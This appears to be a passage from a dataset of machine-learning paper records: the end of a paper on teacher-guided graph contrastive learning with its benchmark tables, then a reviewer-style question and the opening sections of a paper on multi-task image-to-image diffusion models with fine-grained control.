64.2 ± 0.5 | 71.15 | | ContextPred (Hu et al., 2020) | 68.0 ± 2.0 | 65.9 ± 3.8 | 75.8 ± 1.7 | 77.3 ± 1.0 | 79.6 ± 1.2 | 60.9 ± 0.6 | 75.7 ± 0.7 | 63.9 ± 0.6 | 70.89 | | Infomax (Veličković et al., 2019) | 68.8 ± 0.8 | 69.9 ± 3.0 | 75.3 ± 2.5 | 76.0 ± 0.7 | 75.9 ± 1.6 | 58.4 ± 0.8 | 75.3 ± 0.5 | 62.7 ± 0.4 | 70.29 | | GraphCL (You et al., 2020) | 69.7 ± 0.7 | 76.0 ± 2.7 | 69.8 ± 2.7 | 78.5 ± 1.2 | 75.4 ± 1.4 | 60.5 ± 0.9 | 73.9 ± 0.7 | 62.4 ± 0.6 | 70.78 | | JOAO (You et al., 2021) | 70.2 ± 1.0 | 81.3 ± 2.5 | 71.7 ± 1.4 | 76.7 ± 1.1 | 77.3 ± 0.3 | 60.0 ± 0.8 | 75.0 ± 0.3 | 62.9 ± 0.5 | 71.89 | | JOAOv2 (You et al., 2021) | 71.4 ± 0.8 | 83.7 ± 1.2 | 73.7 ± 1.2 | 77.1 ± 1.2 | 75.1 ± 1.3 | 60.2 ± 0.7 | 75.1 ± 0.6 | 63.0 ± 0.6 | 72.16 | | GraphLoG (Xu et al., 2021) | 72.6 ± 0.8 | 76.7 ± 3.3 | 76.0 ± 1.1 | 77.8 ± 0.8 | 78.5 ± 1.2 | 61.2 ± 1.1 | 75.7 ± 0.5 | 63.5 ± 0.7 | 73.36 | | BGRL (Thakoor et al., 2022) | 66.7 ± 4.7 | 64.7 ± 6.5 | 69.4 ± 2.7 | 75.5 ± 1.9 | 71.3 ± 5.5 | 60.4 ± 1.4 | 74.8 ± 0.7 | 63.2 ± 0.8 | 68.25 | | SimGCL (Yu et al., 2022) | 67.4 ± 1.2 | 55.7 ± 4.7 | 71.2 ± 1.8 | 75.0 ± 0.9 | 74.1 ± 2.7 | 57.4 ± 1.7 | 74.4 ± 0.5 | 62.3 ± 0.4 | 67.19 | | SimGRACE (Xia et al., 2022) | 71.3 ± 0.9 | 64.2 ± 4.5 | 71.2 ± 3.4 | 74.5 ± 1.1 | 73.8 ± 1.4 | 60.9 ± 0.9 | 74.2 ± 0.6 | 63.4 ± 0.5 | 69.13 | | D-SLA (Kim et al., 2022) | 72.6 ± 0.8 | 80.2 ± 1.5 | 76.6 ± 0.9 | 78.6 ± 0.4 | 83.8 ± 1.0 | 60.2 ± 1.1 | 76.8 ± 0.5 | 64.2 ± 0.5 | 74.13 | | Our TGCL-NTXent (w/ GraphLoG) | 74.9 ± 0.9 | 85.3 ± 2.2 | 78.9 ± 1.0 | 79.1 ± 0.5 | 83.7 ± 1.4 | 63.6 ± 0.6 | 76.7 ± 0.4 | 64.1 ± 0.4 | 75.79 | | Our TGCL-NTXent (w/ D-SLA) | 74.0 ± 0.4 | 82.8 ± 2.2 | 77.0 ± 0.9 | 77.9 ± 0.3 | 84.3 ± 1.0 | 64.2 ± 0.3 | 76.6 ± 0.1 | 64.7 ± 0.4 | 75.19 | | Our TGCL-DSLA (w/ GraphLoG) | 74.8 ± 0.3 | 80.6 ± 0.5 | 77.4 ± 0.1 | 78.6 ± 0.2 | 83.0 ± 1.1 | 61.4 ± 0.4 | 76.1 ± 0.1 | 64.0 ± 0.3 | 74.49 | | Our TGCL-DSLA (w/ D-SLA) | 73.5 ± 0.9 | 84.9 ± 1.3 | 79.4 ± 0.9 | 78.8 ± 0.5 | 85.2 ± 0.4 | 61.2 ± 1.0 | 76.9 ± 0.1 | 64.9 ± 0.2 | 75.60 | the anchor, $G_0$, its perturbed variations, $G_{pi}$, and the negative graphs, $G_{nj}$, as follows: $$\beta_{ij} = \max (\beta, \mathcal{D}_{dp}(G_0, G_{nj}) - \mathcal{D}_{dp}(G_0, G_{pi}))$$ $$\mathcal{L}_{T-Margin} = \sum_{i,j} \max \left(0, \beta_{ij} + \text{dist}(f_s(G_{pi}), f_s(G_o)) - \text{dist}(f_s(G_{nj}), f_s(G_o))\right)$$ **Overall Loss:** We obtain the overall loss by combining all three components as follows: $$\mathcal{L}_{TGCL-DSLA} = \mathcal{L}_{T-soft} + \lambda_1 \mathcal{L}_{T-percept} + \lambda_2 \mathcal{L}_{T-Margin}$$ Where $\lambda_1$ and $\lambda_2$ are the hyper-parameters for training the student model, as used in D-SLA. ## 4 EXPERIMENTAL RESULTS An effective representation of a graph should capture both the global structure and the local semantics. Therefore, to gauge the efficacy of the proposed method in learning informative representations, we conduct two sets of experiments — (i) Graph Classification and (ii) Link prediction. We provide additional details and ablation studies in our Appendix. Our anonymized code is available [here]. ### 4.1 GRAPH CLASSIFICATION **Datasets.** Following prior works [You et al., 2021; Xu et al., 2021; Kim et al., 2022], we utilize ZINC15 [Sterling & Irwin, 2015] to train the representation learning models. Next, we finetune the models on eight different molecular benchmarks from MoleculeNet [Wu et al., 2018]. We divide the datasets based on the constituting molecules’ scaffold (molecular substructure) and evaluate models’ generalization ability on out-of-distribution test data samples [Wu et al., 2018]. **State-of-the-art Baselines.** We compare the proposed method’s performance against twelve existing methods: EdgePred [Hamilton et al., 2017], AttrMasking [Hu et al., 2020], ContextPred [Hu et al., 2020], Infomax [Veličković et al., 2019], GraphCL [You et al., 2020], JOAO [You et al., 2021], JOAOv2 [You et al., 2021], GraphLoG [Xu et al., 2021], BGRL [Thakoor et al., 2022], SimGCL [Yu et al., 2022], SimGRACE [Xia et al., 2022] and D-SLA [Kim et al., 2022]. **Evaluation Metric.** We compare the Area Under Receiver Operating Characteristic curve (AUROC) for benchmarking [Davis & Goadrich, 2006]. AUROC quantifies the overall discriminative power of the classifier across all possible classification thresholds. AUROC value ranges between 0 and 1, with higher values indicating better discrimination ability of the model. **Results.** In Table 1, we can see that the “no pretraining” model achieves the least performance. While predictive pretraining improves upon the no pertaining model, their performance remains worse than the CL models. This is because predictive methods primarily focus on the local structure, while molecule property classification requires global structure. In contrast, CL methods focus on the global structure by contrasting between original and perturbed graphs to achieve better performance. While a few augmentation-free CL [Yu et al., 2022; Xia et al., 2022] methods are proposed, their performance remains significantly lower than the state-of-the-art. GraphLoG achieves near state-of-the-art performance by exploring both global semantics and local substructures. However, D-SLA achieves state-of-the-art performance by exploring the local discrete properties of graphs. For our proposed framework, we report the results by using GraphLoG and D-SLA as teacher modules for both TGCL-NTXent and TGCL-DSLA models, demonstrating the generalizability of our framework. As we can see, the proposed method achieves a consistent performance boost irrespective of the training methodology of the teacher module. Furthermore, we observe that TGCL-NTXent (w/ GraphLoG) achieves the best performance. Also, TGCL-DSLA (w/ D-SLA) achieves comparable performance as TGCL-NTXent (w/ GraphLoG). In particular, we do not observe an additional advantage of using more graph-specific D-SLA-based loss functions while learning global graph-level representations for molecular property prediction tasks. In Figure 4, we visualize the learned latent space of GraphLoG, D-SLA, and our TGCL-DSLA (w/ DSLA) utilizing t-SNE (Van der Maaten & Hinton [2008]). We observe that both GraphLog and TGCL-DSLA segregate the positive and negative samples more successfully compared to DSLA. ### 4.2 LINK PREDICTION **Datasets.** We consider COLLAB, IMDB-Binary, and IMDB-Multi from TU Benchmarks (Morris et al., 2020). We use the same data splits as in (Kim et al., 2022). **State-of-the-art Baselines.** We compare the proposed method against various predictive methods (AttrMasking (Hu* et al., 2020), ContextPred (Hu* et al., 2020)), contrastive frameworks (Infomax (Veličković et al., 2019), GraphCL (You et al., 2020), JOAO (You et al., 2021), GraphLoG (Xu et al., 2021), BGRL (Thakoor et al., 2022), SimGCL (Yu et al., 2022), SimGRACE (Xia et al., 2022)) and discriminative learning algorithm (D-SLA (Kim et al., 2022)). **Evaluation Metric.** We compare average precision (as in (Kim et al., 2022)). It ranges from 0 to 1, with a higher value indicating better performance. **Results.** Table 2 demonstrates that, unlike graph classification tasks, local context plays a crucial role in link prediction. Therefore, the predictive models typically outperformed most of the CL methods. Among the existing CL methods, GraphLog performs similarly to ContextPred as it focuses on both local and global structures. D-SLA achieves better performance by capturing local structures using edit-distance-based discriminations that standard CL models fail to distinguish. In comparison, our proposed distilled distance from the teacher network incorporates a regularized notion of both local and global semantics. The local semantics are encapsulated from the latent features of the initial layers, while the global semantics are contained within the high-level global features. Therefore, we can surpass existing local and global representation learning-based models by visible margins for all three datasets. Interestingly, our TGCL-DSLA (w/GraphLog) performs ![Figure 4](image-url) (a) GraphLoG (b) D-SLA (c) TGCL-DSLA **Table 2:** Performance (mean ± std) comparison on link prediction task. | Methods | COLLAB | IMDB-Binary | IMDB-Multi | Avg. | |--------------------------|--------|-------------|------------|------| | No Pretrain | 80.01 ± 1.14 | 65.72 ± 3.58 | 64.93 ± 1.92 | 71.22 | | AttrMasking (Hu* et al., 2020) | 81.43 ± 0.80 | 70.62 ± 3.68 | 63.37 ± 2.15 | 71.81 | | ContextPred (Hu* et al., 2020) | 83.96 ± 0.75 | 70.47 ± 2.24 | 66.09 ± 2.74 | 73.51 | | Infomax (Veličković et al., 2019) | 80.83 ± 0.62 | 67.25 ± 1.87 | 64.98 ± 2.47 | 71.02 | | GraphCL (You et al., 2020) | 76.04 ± 1.04 | 63.71 ± 2.98 | 62.40 ± 3.04 | 67.38 | | JOAO (You et al., 2021) | 76.57 ± 1.54 | 65.37 ± 3.23 | 62.76 ± 1.52 | 68.23 | | GraphLoG (Xu et al., 2021) | 82.95 ± 0.98 | 69.71 ± 3.18 | 64.88 ± 1.87 | 72.51 | | BGRL (Thakoor et al., 2022) | 76.79 ± 1.13 | 67.97 ± 4.14 | 63.71 ± 2.09 | 69.49 | | SimGCL (Yu et al., 2022) | 74.47 ± 1.54 | 64.11 ± 2.79 | 62.81 ± 2.32 | 68.72 | | SimGRACE (Xia et al., 2022) | 74.51 ± 1.54 | 64.49 ± 2.79 | 62.81 ± 2.32 | 68.72 | | D-SLA (Kim et al., 2022) | 86.21 ± 0.38 | 78.54 ± 2.79 | 69.45 ± 2.29 | 78.07 | | TGCL-NTXent (w/ GraphLoG) | 87.23 ± 0.14 | 75.09 ± 1.88 | 67.11 ± 3.75 | 76.48 | | TGCL-NTXent (w/ D-SLA) | 87.51 ± 1.24 | 77.95 ± 3.89 | 67.88 ± 2.20 | 77.78 | | TGCL-DSLA (w/ GraphLoG) | **91.09 ± 0.33** | **83.15 ± 0.89** | **74.11 ± 1.44** | **82.78** | | TGCL-DSLA (w/ D-SLA) | 87.51 ± 0.59 | 80.03 ± 4.13 | 70.97 ± 2.42 | 79.50 | Table 3: Impact of the capacity of the student TGCL-DSLA models (mean ± std) for graph classification. “Full-capacity” denotes the 5-layered model (i.e., the same capacity as the teacher). | Model | BBBP | ClinTox | MUV | HIV | BACE | SIDER | Tox21 | ToxCat | Avg | |------------------------|------|---------|-------|-------|------|-------|-------|--------|-----| | D-SLA [Kim et al., 2022] | 72.6 ± 0.8 | 80.2 ± 1.5 | 76.6 ± 0.9 | 78.6 ± 0.4 | 83.8 ± 1.0 | 60.2 ± 1.1 | 76.8 ± 0.5 | 64.2 ± 0.5 | 74.1± | | w/full-capacity | 73.5 ± 0.9 | 84.9 ± 1.3 | 79.4 ± 0.9 | 78.8 ± 0.5 | 85.2 ± 0.4 | 61.3 ± 1.0 | 76.9 ± 0.1 | 64.9 ± 0.2 | 75.6± | | w/3-layer Student | 74.6 ± 0.4 | 84.6 ± 1.4 | 76.4 ± 1.0 | 77.9 ± 0.1 | 82.7 ± 1.1 | 61.0 ± 0.3 | 75.0 ± 0.1 | 63.6 ± 0.4 | 74.48 | | w/2-layer Student | 72.6 ± 0.5 | 81.4 ± 0.4 | 77.3 ± 1.5 | 77.6 ± 0.2 | 80.6 ± 0.4 | 60.8 ± 0.4 | 74.7 ± 0.4 | 63.0 ± 0.1 | 73.50 | Better than TGCL-DLSA (w/D-SLA) even though D-SLA outperformed GraphLog. Therefore, a better teacher does not necessarily produce better distillation for the student, as previously observed and analyzed in supervised learning (Menon et al., 2021; Kaplun et al., 2022; Zong et al., 2023). We also observe that TGCL-NTXent produces poor performance compared to TGCL-DSLA and often even compared to its teacher models. This is because NT-Xent loss focuses only on contrasting the global representations, failing to capture the local graph characteristics. Therefore, even when a regularized notion of both local and global semantics is provided in terms of the distilled distance, NT-Xent-based TGCL models failed to utilize it efficiently for the link prediction tasks. We can also validate this hypothesis by comparing the performance of GraphCL, which uses NT-Xent loss, compared to the other methods (Table 2). ### 4.3 Experiments with Compressed Student Table 3 demonstrates the performance of a student TGCL-DSLA model on the downstream molecular property prediction task. We can see that, with the same capacity (i.e., 5 layers of GNN) as the teacher module of D-SLA, our proposed student network consistently outperformed the teacher. As we decrease the capacity of our student network by reducing the number of layers, the overall performance reduces. However, we observe that even with 3 layers of GNN, our student module outperforms the teacher D-SLA model. Therefore, these results demonstrate that our proposed TGCL framework can compress the student representation network by enabling smoothed knowledge transfer from a pre-trained teacher to the student representation learning model. ### 5 Conclusion & Discussion We utilize Knowledge distillation (KD) for graph representation learning, where a self-supervised pre-trained teacher model is used to guide the training of a student model to obtain more generalized representations. Extensive experimentation demonstrates the effectiveness of the proposed method in improving the performance of graph classification and link prediction tasks. However, there are still many open challenges in graph representation learning, such as the efficient handling of large-scale graphs, the ability to handle heterogeneity and multimodality, and the development of robust methods for noisy or incomplete data. Probing these challenges further and developing new graph representation learning techniques are in the scope of future research direction. **Limitations.** The performance of a student network heavily depends on the teacher’s quality. While a more accurate ‘teacher’ does not necessarily lead to better distillation, a ‘bad’ teacher can reduce the student’s performance. In particular, a better teacher yields a better approximation of the Bayes class probability distribution while leading to higher variance (i.e., unstable predictions) (Menon et al., 2021). Further, the teacher-student architecture is computationally expensive as we first need to train the teacher, followed by the student. **Broader Impact.** KD can significantly impact graph representations, with broader implications for various fields including bioinformatics, drug discovery, social network analysis, recommendation systems, etc. A few potential impacts of our work are as follows: (a) Improves the efficiency and scalability of graph representation learning by enabling “soft” knowledge transfer from a pre-trained teacher model to a smaller, more efficient student network. (b) Improves the generalization performance of graph representation learning models by leveraging the ‘dark knowledge’ encoded in a pre-trained teacher model’s representations. Overall, KD has the potential to significantly impact graph representations, therefore on various applications that rely on graphs and network analysis. Reproducibility Statement. To ensure that the proposed work is reproducible, we have included an Algorithm (Refer to Appendix Algorithm [1]). We have clearly defined the loss functions in Section 3.3. The implementation details and hyperparameters are specified in Section D. The code of the proposed method is available at: https://anonymous.4open.science/r/TGCL-400E/. This is an anonymous link that doesn’t reveal the author’s identity. We have also included ReadMe files (inside each folder) to reproduce our results for convenience. Ethics statement. The ideas and techniques proposed in this paper can be useful in several real-world applications including the medical domain and e-commerce applications. We have touched on both the theoretical as well as experimental aspects of this problem in our work. We believe our results/findings should be available for all scientific communities for further research and development in this area, independent of their background (e.g., race, caste, creed, gender, nationality, etc.). The datasets used in our experiments are purely academic, and we do not think our work poses any specific ethical questions or creates potential biases against any particular groups. REFERENCES Soroush Abbasi Koohpayegani, Ajinkya Tejankar, and Hamed Pirsiavash. Compress: Self-supervised learning by compressing representations. Advances in Neural Information Processing Systems, 33:12980–12992, 2020. Nesreen K Ahmed, Jennifer Neville, Ryan A Rossi, and Nick Duffield. Efficient graphlet counting for large networks. In 2015 IEEE international conference on data mining, pp. 1–10. IEEE, 2015. Jinheon Baek, Dong Bok Lee, and Sung Ju Hwang. Learning to extrapolate knowledge: Transductive few-shot out-of-graph link prediction. Advances in Neural Information Processing Systems, 2020. Prashant Bhat, Elahe Arani, and Bahram Zonooz. Distill on the go: online knowledge distillation in self-supervised learning. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 2678–2687, 2021. K.M. Borgwardt and H.P. Kriegel. Shortest-path kernels on graphs. In Fifth IEEE International Conference on Data Mining (ICDM’05), 2005. Ting Chen, Simon Kornblith, Mohammad Norouzi, and Geoffrey Hinton. A simple framework for contrastive learning of visual representations. In International conference on machine learning, pp. 1597–1607. PMLR, 2020a. Ting Chen, Simon Kornblith, Kevin Swersky, Mohammad Norouzi, and Geoffrey E Hinton. Big self-supervised models are strong semi-supervised learners. Advances in neural information processing systems, 33:22243–22255, 2020b. Jesse Davis and Mark Goadrich. The relationship between precision-recall and roc curves. In Proceedings of the 23rd international conference on Machine learning, pp. 233–240, 2006. Wenqi Fan, Yao Ma, Qing Li, Yuan He, Eric Zhao, Jiliang Tang, and Dawei Yin. Graph neural networks for social recommendation. In The world wide web conference, pp. 417–426, 2019. Zhiyuan Fang, Jianfeng Wang, Lijuan Wang, Lei Zhang, Yezhou Yang, and Zicheng Liu. Seed: Self-supervised distillation for visual representation. arXiv preprint arXiv:2101.04731, 2021. Matthias Fey and Jan Eric Lenssen. Fast graph representation learning with pytorch geometric. arXiv preprint arXiv:1903.02428, 2019. Tommaso Furlanello, Zachary Lipton, Michael Tschannen, Laurent Itti, and Anima Anandkumar. Born again neural networks. In International Conference on Machine Learning, pp. 1607–1616. PMLR, 2018. Yuting Gao, Jia-Xin Zhuang, Shaohui Lin, Hao Cheng, Xing Sun, Ke Li, and Chunhua Shen. Disco: Remedying self-supervised learning on lightweight models with distilled contrastive learning. In European Conference on Computer Vision, pp. 237–253. Springer, 2022.
bFMpmb8p3D
Why did the author start with the inverse image restoration (motion blurring) instead of the image restoration task (deblurring)? Blurring an image seems very easy, a simple convolution with a blur kernel could achieve similar film-blurring effect.
MULTI-TASK IMAGE-TO-IMAGE DIFFUSION MODELS WITH FINE-GRAINED CONTROL Anonymous authors Paper under double-blind review ABSTRACT Diffusion models have recently been applied to various image restoration and editing tasks, showing remarkable results in commercial products, e.g., Adobe Photoshop. While recent approaches to text-based editing have shown flexibility and great editing capacity, they still lack fine-grained control and/or multi-task compositing capabilities. In everyday applications, however, having a single tool for image editing with detailed user control across multiple tasks is highly preferred. This paper proposes a multi-task image-to-image diffusion model that allows fine-grained image editing among multiple tasks within a single model. Our approach builds upon conditional diffusion models and jointly models the input images and the input compositing effects, including motion blur, film grain, colorization, image sharpening, and inpainting. We present a novel input conditioning formulation and observe that using explicit binary task activation labels and cross-attention-based feature conditioning are key to allowing the model to achieve multi-task editing. In addition, we introduce a novel benchmark dataset for image compositing effects with standard image metrics for advancing the state of the art. Our approach can manipulate natural images with fine-grained, disentangled user control on single- and multi-task editing setups and generalizes well across different domains and even to unseen data distributions. We present experimental results on various compositing tasks to show that our approach outperforms existing techniques and baselines. 1 INTRODUCTION Diffusion models have recently made significant progress in image generation [Ho et al., 2020; Dhariwal & Nichol, 2021], attracting large interest to generative AI. The famous stable diffusion approach by [Rombach et al., 2022] generates impressive images based on text prompts, revolutionizing the entire art industry. Many commercial photo editors now integrate AI-based editing modules based on stable diffusion, such as Adobe Photoshop, Luminar Neo, Canva, and Lensa. Diffusion-based models have been applied to various image-to-image translation tasks, including image super-resolution [Saharia et al., 2022c], inpainting [Saharia et al., 2022a], Lugmayr et al. (2022), denoising [Kawar et al., 2022a; Zhu et al., 2023], Murata et al. (2023), deblurring [Whang et al., 2022; Ren et al., 2022], stroke-based editing [Meng et al., 2021] and text-based editing [Brooks et al., 2023; Parmar et al., 2023]. Existing work on diffusion-based image editing focuses more on image restoration tasks, e.g., denoising and deblurring. The inverse tasks, e.g., motion blur and film grain synthesis, are yet to be explored. Among the different types of approaches, text-based editing stands out as one of the hottest topics in diffusion-based image editing since it provides users direct control via intuitive text prompts [Brooks et al., 2023; Parmar et al., 2023; Tumanyan et al., 2023]. Localized editing can be achieved by integrating masks [Avrahami et al., 2022] or feature injection [Hertz et al., 2022; Tumanyan et al., 2023]. Nevertheless, fine-grained control is not ensured as the text encoders are not trained with this intent but instead for general-purpose tasks. Besides, they are initialized from pretrained models, e.g., BERT [Devlin et al., 2018] and CLIP [Radford et al., 2021], which are frozen during training. However, photo editing with fine-grained control is a primal need for end users. Another feature of great demand is multi-task editing, which allows for performing multiple tasks within a single model. For instance, in film post-production, artists need to incrementally add compositing effects, such as motion blur, film grain, and colorization, to the processed frames. Thus, a single model that performs multiple editing tasks simultaneously is highly desirable for efficiency and preventing the accumulation of undesired artifacts. Unfortunately, multi-task training for image-to-image translation is relatively under-explored [Saharia et al., 2022a]. In this paper, we focus on the problem of multi-task image editing, which aims to learn a single model for multiple image-to-image translation tasks. Such a problem is exceptionally challenging as the model needs to learn a shared feature space and disentangle each task simultaneously for multi-task editing capabilities. On top of that, given a set of $N$ editing tasks, there are $\sum_{k=1}^{N} \binom{N}{k}$ target task combinations. As such, providing all possible combinations in the training data turns intractable, especially with increasing editing tasks. To tackle the above limitations, we propose a multi-task image-to-image diffusion-based framework that is trained on single-task editing data but generalizes to multi-task edits. Specifically, we design a novel multi-modal input conditioning formulation that provides explicit user control over each task. It includes image conditions applied via image concatenation and an editing vector condition applied via cross-attention features. While cross-attention-based conditioning has been proposed before [Rombach et al., 2022], it has mainly been applied to text-to-image diffusion models to allow for generalizing to complex text prompts. In our formulation, the editing vector condition represents task-specific editing handlers to provide explicit fine-grained user control over each task. We also add binary task activation labels, represented as one-hot encodings, to the input editing vector. We observe that cross-attention-based conditioning and explicit binary labels are key to allowing the model to generalize on combined tasks. We train our model on different image editing/compositing tasks, including motion blur synthesis, film grain synthesis, color transfer, inpainting, and sharpening. We remark that motion blur and film grain synthesis are less explored in the literature. However, they are of prime importance for practical use in professional pipelines, e.g., film post-production and VFX, as it is non-trivial to synthesize these effects with fine control and ensure naturally-looking results in multi-task editing setups. Our proposed input conditioning provides explicit task activation and user control, including the level of motion blur, the size of film grain, the reference image for colorization, the amount of sharpness, and the inpainting region. We provide extensive experimental results to show that our method outperforms existing baselines. Our main contributions can be summarized as follows: - We propose a novel diffusion-based architecture for multi-task image-to-image translation problems, providing users with fine-grained control over each task. - We propose a novel conditioning formulation that allows the model trained on data with single-task edits to generalize well to multi-task editing. We identify that an explicit binary task activation vector and cross-attention-based conditioning are key to model generalization. - Our approach yields competitive results on single-task editing and state-of-the-art results for multi-task editing. It also generalizes to novel datasets not viewed at training time. - We introduce a novel benchmark dataset based on REDS [Nah et al., 2019] with standard image metrics for advancing the state of the art. 2 RELATED WORK Image-to-image translation. Historically, Generative Adversarial Networks (GANs) [Goodfellow et al., 2014; Radford et al., 2015; Creswell et al., 2018; Brock et al., 2018] have been a popular architectural choice for image-to-image translation tasks. Image-to-image translation tasks have been attempted by conditional generative models [Isola et al., 2017; Wang et al., 2018; Kim et al., 2020] with success across a wide variety of domains, such as semantic labels to photo-real image or colorization. However, this requires a separate paired dataset per task and a separate model for each task. Other methods apply edits within the GAN latent space [Shen et al., 2020; Kim et al., 2021] using vector arithmetic. This can yield interesting results due to the disentangled nature of the latent space of a well-trained GAN. However, it does not allow fine-grained control of attributes and is prone to artifacts. GAN inversion [Xia et al., 2021] has also been used to create paired data for the conditional generative paradigm when this is not feasible to obtain [Wu et al., 2022]. This suffers from similar drawbacks, namely artifacts in the output and the limitation of the abilities of the encoder to encode the source image into the latent space. GANs have additionally been used for style transfer [Taigman et al., 2017; Liu et al., 2019], for example with CycleGANs [Zhu et al.,... where a cycle consistency loss is enforced to map between a source image domain and a target domain in an unsupervised manner. This overcomes the limitation of requiring paired data, but it does not allow for fine-grained control of the image modification. Composing effects, such as motion blur Luo et al. (2018) and film grain addition or removal Ameur et al. (2023), are less explored and we seek to remedy this in our proposed method. **Diffusion techniques.** Diffusion models Sohl-Dickstein et al. (2015) have received considerable attention since their initial conception and deployment for image generation Ho et al. (2020); Nichol & Dhariwal (2021); Ho et al. (2022); Song et al. (2022a); Rombach et al. (2022) as they produce very high-quality samples, are more stable during training and capable of more diverse image generation than GANs. They have shown good performance on several image restoration tasks Kadkhodaei & Simoncelli (2021); Sasaki et al. (2021); Kawar et al. (2022a); Saharia et al. (2022c); Zhu et al. (2023); Murata et al. (2023), although multi-task editing is less explored. For multi-task editing without re-training the diffusion model for each task, guidance from an external classifier or regression model can be added at sampling time Wolleb et al. (2022); Ho & Salimans (2022); Kawar et al. (2022b). Text-based editing Ramesh et al. (2022); Saharia et al. (2022b); Rombach et al. (2022) seeks to control the structure of a generated image, which can be achieved by using spatial attention maps generated from a reference prompt to edit part of the generated image Hertz et al. (2022); Tumanyan et al. (2023). While designed for synthetic images, real images can be edited through inversion. However, this does not always produce an accurate result Zhang et al. (2023). Further research uses inversion to create paired training data for a conditional model Brooks et al. (2023). While this allows generalization to real images, it does not support fine-grained control. For more advanced control of text-to-image models, e.g., with segmentation or edge maps, a hypernetwork-adjacent architecture can be used Zhang & Agrawala (2023). However, paired training data is still required, and multi-task conditioning was not investigated. An end-to-end approach, which may be more desirable, has been accomplished with adapted text-to-image models that use latent embeddings of an object created with a vision transformer Song et al. (2022b). Although this retains the object’s semantics and holistically matches its color, lighting, etc. in the scene, it does not retain the fine detail of the image and gives little control to the user. **Multi-task image editing.** As training a model for each domain would be intractable when building large-scale pipelines, the “multi-task” approach capable of editing within many domains has great value within image-to-image editing Yu et al. (2018); Qian et al. (2022). Some approaches seek to accomplish this with a GAN-based framework through additional class labels Choi et al. (2018) or mapping networks Choi et al. (2020). This adds computational overhead and complexity to the training. It also adds additional modes to the network; GANs are known to drop modes or collapse entirely to only one mode Zhang et al. (2018b). To alleviate these issues, other work Saharia et al. (2022a) uses diffusion models that more completely represent all the modes found in the data distribution. Palette introduces a diffusion model trained on a dataset exhibiting various image degradations with the goal of a generalist model capable of multiple tasks (colorization, inpainting, uncropping, and JPEG restoration). Although it shows the success of training diffusion models on multiple tasks simultaneously, it does not fully specify the task at training time, and therefore, there is a lack of control over the type and amount of the image restoration. Our approach builds on this work by introducing additional conditioning to the model for more fine-grained control of the output. ### 3 METHOD Our task is to train a single diffusion model on multiple image-to-image translation tasks simultaneously, with fine-grained user control over each individual task. #### 3.1 IMAGE-TO-IMAGE DIFFUSION MODELS First, we briefly overview our baseline framework derived from Palette Saharia et al. (2022a), which is further built upon conditional diffusion models for image-to-image translation. Please refer to the supplementary document for a general introduction to diffusion models. Conditional diffusion models can be expressed as a sequence of denoising autoencoders \( \epsilon_\theta(x, y_t, t) \), where \( y_t \) is the noisy version of \( y \) at the diffusion time step \( t \). The conditioning of source image \( x \) is applied by concatenating \( y_t \) with \( x \). Palette’s loss is defined as: \[ L_{Pal} = \mathbb{E}_{x, y, \epsilon \sim N(0,1), t} \left[ \| \epsilon_\theta(x, y_t, t) - \epsilon \|_2^2 \right], \] where \( y_t = \sqrt{\alpha_t} y + \sqrt{1 - \alpha_t} \epsilon \), with \( \alpha_t \) being the noise level indicator at time step \( t \). ### 3.2 Multi-task Image-to-image Diffusion Models Multi-task learning has been briefly discussed in Palette [Saharia et al., 2022a]. The multi-task Palette model is trained simultaneously on four tasks: colorization, inpainting, uncropping, and JPEG restoration. This multi-task framework shares the same architecture of the task-specific one, conditioned directly on the input image. Although the multi-task Palette model achieves comparable results to task-specific models, it provides no user control over each task. Furthermore, the multi-task Palette model learns to map four different domains into the same domain of natural images, akin to an N-to-1 mapping. Note that their current conditioning design does not allow N-to-N mapping either. To address these concerns, we design a multi-task image-to-image diffusion model that allows explicit fine-grained control over each task. We train the model simultaneously on five image-to-image translation tasks commonly used in film production pipelines: motion blur synthesis, film grain synthesis, color transfer, inpainting, and sharpening. We realize these tasks within a single model, i.e., our model is trained to learn an N-to-N mapping. #### Architecture. The architecture of our proposed multi-task image-to-image diffusion model is detailed in Fig. 1. We extend Palette model to the state-of-the-art Latent Diffusion Models (LDMs) [Rombach et al., 2022], where the diffusion models are trained in the latent space of a pretrained perceptual compression model. As shown in Fig. 1, the source image is denoted by \( I_A \), and the target image is denoted by \( I_B \). We use \( VQ \) to denote the pretrained autoencoder. The latent codes corresponding to \( I_A \) and \( I_B \) are denoted by \( z_0^A \) and \( z_0^B \), respectively. Following LDMs, we train the diffusion models in the latent space of \( VQ \). Hence, the objective is to learn the target latent code \( z_t^B \) from the source latent code \( z_t^A \) using the color reference image \( I_{ref} \) and the editing vector \( C \). The loss function is expressed as follows: \[ L = \mathbb{E}_{z^A, z^B, I_{ref}, C, \epsilon \sim \mathcal{N}(0,I), t} \left[ \| \epsilon_\theta(z^A_0, I_{ref}, C, z^B_t, t) - \epsilon \|_p \right], \] where \( p = 1 \). Although \( \ell_2 \) norm favors sample diversity [Saharia et al., 2022a], our experimental results show that \( \ell_1 \) norm attains better reconstruction quality. #### Conditioning. One of the core differences between our architecture and Palette’s is the input conditioning. Palette is conditioned solely on the source image. To provide better control for end users, we add additional input conditions for each task: blur degree \( \beta \) for motion blur synthesis, grain size \( \sigma \) for film grain synthesis, color reference image \( I_{ref} \) for color transfer, inpainting mask \( M \) for inpainting, and sharpening amount \( \lambda \) and threshold \( \mu \) for the sharpening task. In addition, we include the binary task activation labels, i.e., one-hot encodings, to indicate whether the corresponding task is active. | Via Concatenation | Via Cross attention | |-------------------|---------------------| | Input Image: \( I_A \) | blur degree: \( \beta \in [0, 1] \) | | Color Reference: \( I_{ref} \) | grain size: \( \sigma \in [0, 0.1] \) | | | sharp. amount: \( \lambda \in [1, 3] \) | | | sharp. threshold: \( \mu \in [0, 0.1] \) | | | bin. task labels \([e_1, e_2, e_3, e_4, e_5]\) | scaling factors \([\beta, \sigma, \lambda, \mu]\) and the binary task activation vector \([e_1, e_2, e_3, e_4, e_5]\) are concatenated into an editing vector \(C = [\beta, \sigma, \lambda, \mu, e_1, e_2, e_3, e_4, e_5]\). Our proposed model is conditioned on the source latent code \(z^A_0\), the color reference image \(I_{ref}\), and the editing vector \(C\). As such, our model employs multi-modal input conditioning. Note that the conditioning of the source latent code \(z^A_0\) and the color reference \(I_{ref}\) is applied via concatenation. For the color reference conditioning, we use the RGB image \(I_{ref}\) down-sampled to the spatial size of \(z^A_0\), since we find that RGB input conditioning yields more accurate color transfer than compressed conditioning. In view of the high-quality results achieved by recent text-to-image diffusion models, we apply the editing vector \(C\) using a cross-attention conditioning mechanism, as proposed by Rombach et al. (2022). 